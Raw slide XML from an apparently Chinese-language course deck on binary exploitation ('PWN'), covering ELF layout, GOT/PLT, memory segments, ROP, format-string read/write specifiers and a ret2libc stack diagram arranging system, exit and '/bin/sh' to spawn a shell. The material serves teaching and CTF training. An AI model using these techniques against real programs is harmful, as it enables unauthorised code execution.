              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>73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688949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在栈中写一系列的返回地址，返回地址使得程序在代码段中连续跳转，使得寄存器中包含所需数值，然后调用系统调用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3F1BA8-EAFB-4D5B-B18D-35D07B5B660D}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>74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577470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Shape 81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5" name="Shape 81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Shape 81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5" name="Shape 81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.got </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>全局偏移量表</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"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.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>got.plt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>是函数地址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4091671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Shape 8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5" name="Shape 8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Shape 8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2" name="Shape 8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Shape 8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0" name="Shape 8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Shape 8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9" name="Shape 8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push</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>两个值，作为后面函数调用的参数</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"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index</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>表示要用的是第几个函数</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"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GOT+4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>表示要用的是第几个库</a:t>
            </a:r>
            <a:endParaRPr dirty="0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Shape 9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8" name="Shape 9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.text</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>节放用户代码等不可写的内容</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>GOT(Global Offset Table)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>全局偏移表。这是链接器为外部符号填充的实际偏移表</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>PLT(Procedure Linkage Table)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>程序链接表。作用是一个跳板，保存了某个符号在重定位表中的偏移量</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>用来第一次查找某个符号</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>和对应的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>got.plt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>的对应的地址</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>got.plt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>节</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>GOT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>专门为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>PLT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>准备的节。保存了重定位地址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3F1BA8-EAFB-4D5B-B18D-35D07B5B660D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672980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Shape 92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6" name="Shape 92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Shape 94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5" name="Shape 9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Shape 9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4" name="Shape 9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Shape 9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9" name="Shape 9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" name="Shape 99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4" name="Shape 9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Shape 10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1" name="Shape 10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Shape 10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1" name="Shape 10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10749636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Shape 10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1" name="Shape 10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5971406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3F1BA8-EAFB-4D5B-B18D-35D07B5B660D}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>92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0401144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3F1BA8-EAFB-4D5B-B18D-35D07B5B660D}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>93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75251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栈中存放局部变量</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>堆中动态分配的内存</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>BSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>段中是未初始化的全局变量，在内存中才有</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Data</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>段是初始化的全局变量</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Text</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>段是只读数据，包含代码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3F1BA8-EAFB-4D5B-B18D-35D07B5B660D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2344324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3F1BA8-EAFB-4D5B-B18D-35D07B5B660D}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>94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422721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3F1BA8-EAFB-4D5B-B18D-35D07B5B660D}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>95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7016434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3F1BA8-EAFB-4D5B-B18D-35D07B5B660D}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>96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8389020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3F1BA8-EAFB-4D5B-B18D-35D07B5B660D}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>97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841037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2" name="Shape 14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3" name="Shape 14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system</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>上方第二个字长，压入参数；也就是跨过父函数压入的返回地址，压入参数</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"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/>
              <a:t>因为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>system</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>函数调用的第一步就是压入</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>ebp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>，所以当</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>system</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>寻找自己参数时，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>就会正好向上</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>跨过两个字长，找到参数</a:t>
            </a:r>
            <a:endParaRPr dirty="0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0" name="Shape 144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1" name="Shape 14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1" name="Shape 14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2" name="Shape 14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2" name="Shape 14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3" name="Shape 14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Shape 150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6" name="Shape 15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6" name="Shape 170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7" name="Shape 17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86759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Shape 65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0" name="Shape 6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Shape 172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0" name="Shape 17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7" name="Shape 173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8" name="Shape 17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7" name="Shape 17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8" name="Shape 17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7" name="Shape 17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8" name="Shape 17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7" name="Shape 17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8" name="Shape 17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7" name="Shape 18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8" name="Shape 18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7" name="Shape 18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8" name="Shape 18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8" name="Shape 18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9" name="Shape 18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Shape 19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0" name="Shape 19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4" name="Shape 19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5" name="Shape 19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Shape 68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Shape 6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Id.so</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>管理第三方库的借还</a:t>
            </a:r>
            <a:endParaRPr dirty="0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0" name="Shape 20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1" name="Shape 20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printf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>%s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>可以泄露任意地址的内存，因为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>%s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>会去读取地址中的内容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3F1BA8-EAFB-4D5B-B18D-35D07B5B660D}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>116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6982261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Shape 202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1" name="Shape 20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0" name="Shape 203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1" name="Shape 20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7" name="Shape 203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8" name="Shape 20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Shape 20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6" name="Shape 20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Shape 20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2" name="Shape 20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7" name="Shape 20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8" name="Shape 20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3" name="Shape 20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4" name="Shape 20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%p</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>还可以打印</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>0x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%12$d</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>，表示取第</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>12</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>个参数，一般放在栈上</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"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%s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>可以泄露任意地址的内存，因为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>%s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>会去读取地址中的内容</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"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%20c</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>，一次打印长度为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>20</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>的字符串</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"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%n</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>写入已打印的字符的数量</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"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%n</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>一次写</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>个字节，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>hn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>一次写</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>个字节，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>hhn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>一次写一个字节</a:t>
            </a:r>
            <a:endParaRPr dirty="0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9" name="Shape 20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0" name="Shape 20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F30B5286-7DC6-4515-8C85-93EFF4C090F6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="10889"/>
            <a:ext cx="12192000" cy="400108"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="tx2">
              <a:lumMod val="25000"/>
            </a:schemeClr>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx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997167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userDrawn="1">
  <p:cSld name="blank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180272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132959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userDrawn="1">
  <p:cSld name="1_Title and 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472915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442901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userDrawn="1">
  <p:cSld name="1_Title and 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322077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20449342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89" r:id="rId1"/>
    <p:sldLayoutId id="2147483678" r:id="rId2"/>
    <p:sldLayoutId id="2147483688" r:id="rId3"/>
    <p:sldLayoutId id="2147483690" r:id="rId4"/>
    <p:sldLayoutId id="2147483650" r:id="rId5"/>
    <p:sldLayoutId id="2147483703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1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1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1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1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1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ellman/libformatstr" TargetMode="External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www.cis.syr.edu/~wedu/Teaching/cis643/LectureNotes_New/Format_String.pdf" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://crypto.stanford.edu/cs155/papers/formatstring-1.2.pdf" TargetMode="Externa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1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1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1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1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1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1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1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1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gif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1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1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g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1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1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1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1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1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1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1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1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1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1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1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1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1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1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1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1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1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1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1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1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1.emf"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image40.png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B5992F9D-07E8-4BC5-9060-9AD44D5160EF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="762000" y="1859340"/>
            <a:ext cx="333136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600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>PWN</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="96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6A31576-E6B3-4285-B55D-F84E2EC6EFEC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="846406" y="3611879"/>
            <a:ext cx="48013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solidFill>
                  <a:schemeClr val="bg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二进制漏洞挖掘与利用</a:t>
            </a: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3280A9BA-BCD6-4321-9A3E-FB1EC931F899}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="792000" y="3425483"/>
            <a:ext cx="10800000" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="508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69981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D1D6494D-206D-40FB-A712-9D891EE9484B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="700511" y="1720840"/>
            <a:ext cx="4916731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ELF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文件头表（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ELF header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记录了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ELF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文件的组织结构</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN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zh-CN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程序头表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段表（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Program header table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告诉系统如何创建进程</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN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生成进程的可执行文件必须拥有此结构</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN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重定位文件不一定需要</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN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zh-CN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节头表（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Section header table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记录了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ELF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文件的节区信息</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN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用于链接的目标文件必须拥有此结构</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN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其它类型目标文件不一定需要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38F7642-EE9E-4AD4-8769-C8C8F75C1F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664368"/>
            <a:ext cx="5395489" cy="5978785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154273AA-FF7C-421C-9120-340161B7F493}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="56388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二进制基础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| Linux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下的可执行文件格式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ELF</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="265167016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5" name="Shape 1465"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7106500" y="2494067"/>
            <a:ext cx="2095200" cy="4096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"/bin/sh"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466" name="Shape 1466"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7106500" y="2903667"/>
            <a:ext cx="2095200" cy="4096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exit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467" name="Shape 1467"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7106500" y="3313267"/>
            <a:ext cx="2095200" cy="4096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system</a:t>
            </a:r>
            <a:endParaRPr sz="1867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468" name="Shape 1468"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7106500" y="3722867"/>
            <a:ext cx="2095200" cy="4096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padding</a:t>
            </a:r>
            <a:endParaRPr sz="1867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469" name="Shape 1469"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7106500" y="4132467"/>
            <a:ext cx="2095200" cy="16268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padding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470" name="Shape 1470"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7106500" y="2084467"/>
            <a:ext cx="2095200" cy="4096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0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471" name="Shape 1471"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5671600" y="3111667"/>
            <a:ext cx="848800" cy="4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b="1" kern="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="666666"/>
                </a:highlight>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>ESP</a:t>
            </a:r>
            <a:endParaRPr sz="1867" b="1" kern="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="666666"/>
              </a:highlight>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1472" name="Shape 1472"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6568867" y="3316467"/>
            <a:ext cx="5376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73" name="Shape 1473"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="9471400" y="2109200"/>
            <a:ext cx="21200" cy="36412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474" name="Shape 1474"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9569833" y="3609433"/>
            <a:ext cx="1183600" cy="4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Overflow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475" name="Shape 1475"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9569833" y="2027400"/>
            <a:ext cx="2496800" cy="9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system("/bin/sh")</a:t>
            </a:r>
            <a:endParaRPr sz="1867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exit(0)</a:t>
            </a:r>
            <a:endParaRPr sz="1867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476" name="Shape 1476"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1789867" y="3819267"/>
            <a:ext cx="2882800" cy="25044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lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1867" kern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system:</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0"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lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1867" kern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push ebp</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0"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lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1867" kern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mov ebp, esp</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0"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lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1867" kern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...(execute command)</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0"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lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1867" kern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ret</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0"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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:endParaRPr sz="1867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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="1477" name="Shape 1477"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="288252" y="4254879"/>
            <a:ext cx="1501600" cy="365600"/>
            <a:chOff x="3510225" y="1324000"/>
            <a:chExt cx="1126200" cy="274200"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1478" name="Shape 1478"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3510225" y="1324000"/>
              <a:ext cx="641400" cy="27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r" defTabSz="1219170">
                <a:buClr>
                  <a:srgbClr val="000000"/>
                </a:buClr>
              </a:pPr>
              <a:r>
                <a:rPr lang="en" sz="1867" kern="0"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rPr>
                <a:t>%eip</a:t>
              </a:r>
              <a:endParaRPr sz="1867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cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="1479" name="Shape 1479"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm rot="10800000" flipH="1">
              <a:off x="4151625" y="1454200"/>
              <a:ext cx="484800" cy="69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sp>
        <p:nvSpPr>
          <p:cNvPr id="1480" name="Shape 1480"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1789867" y="1763367"/>
            <a:ext cx="2882800" cy="18292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lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc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stack overflow:</a:t>
            </a:r>
            <a:endParaRPr sz="1867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lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc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push ebp</a:t>
            </a:r>
            <a:endParaRPr sz="1867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lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc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mov ebp, esp</a:t>
            </a:r>
            <a:endParaRPr sz="1867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lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc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...</a:t>
            </a:r>
            <a:endParaRPr sz="1867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lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1867" b="1" kern="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="666666"/>
                </a:highlight>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>ret</a:t>
            </a:r>
            <a:endParaRPr sz="1867" b="1" kern="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="666666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9A357E0F-0C05-4298-9FE4-18E71B75D76D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="10886"/>
            <a:ext cx="56388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返回导向编程 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ret2libc</a:t>
            </a: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Shape 1486"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7106500" y="2494067"/>
            <a:ext cx="2095200" cy="4096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"/bin/sh"</a:t>
            </a:r>
            <a:endParaRPr sz="1867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487" name="Shape 1487"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7106500" y="2903667"/>
            <a:ext cx="2095200" cy="4096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exit</a:t>
            </a:r>
            <a:endParaRPr sz="1867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488" name="Shape 1488"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7106500" y="3313267"/>
            <a:ext cx="2095200" cy="4096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system</a:t>
            </a:r>
            <a:endParaRPr sz="1867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489" name="Shape 1489"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7106500" y="3722867"/>
            <a:ext cx="2095200" cy="4096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padding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490" name="Shape 1490"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7106500" y="4132467"/>
            <a:ext cx="2095200" cy="16268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padding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491" name="Shape 1491"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7106500" y="2084467"/>
            <a:ext cx="2095200" cy="4096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0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492" name="Shape 1492"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5671600" y="3111667"/>
            <a:ext cx="848800" cy="4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ESP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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1493" name="Shape 1493"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6568867" y="3316467"/>
            <a:ext cx="5376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94" name="Shape 1494"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="9471400" y="2109200"/>
            <a:ext cx="21200" cy="36412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495" name="Shape 1495"/>
